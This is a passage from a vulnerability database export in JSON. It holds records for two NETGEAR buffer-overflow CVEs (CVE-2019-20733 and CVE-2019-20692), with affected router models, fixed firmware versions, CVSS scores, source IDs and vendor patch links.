"version": "1.0.0.78"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
}
]
},
"cve": "CVE-2019-20733",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20733",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015450",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-61059",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20733",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20733",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015450",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20733",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20733",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015450",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-61059",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1344",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20733"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "CNVD",
"id": "CNVD-2021-61059"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20733",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-61059",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1344",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"id": "VAR-202004-0753",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
}
],
"trust": 1.1024362164864865
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
}
]
},
"last_update_date": "2024-11-23T23:01:25.029000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers, Gateways, and Extenders, PSV-2017-2017",
"trust": 0.8,
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-61059)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/285361"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20733"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061193/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-gateways-and-extenders-psv-2017-2017"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20733"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"date": "2020-04-16T20:15:13.490000",
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61059"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015450"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1344"
},
{
"date": "2024-11-21T04:39:12.980000",
"db": "NVD",
"id": "CVE-2019-20733"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015450"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1344"
}
],
"trust": 0.6
}
}
var-202004-0901
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250 is a wireless router of NETGEAR. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0901",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.54"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "aircut",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
}
],
"trust": 0.6
},
"cve": "CVE-2019-20692",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20692",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
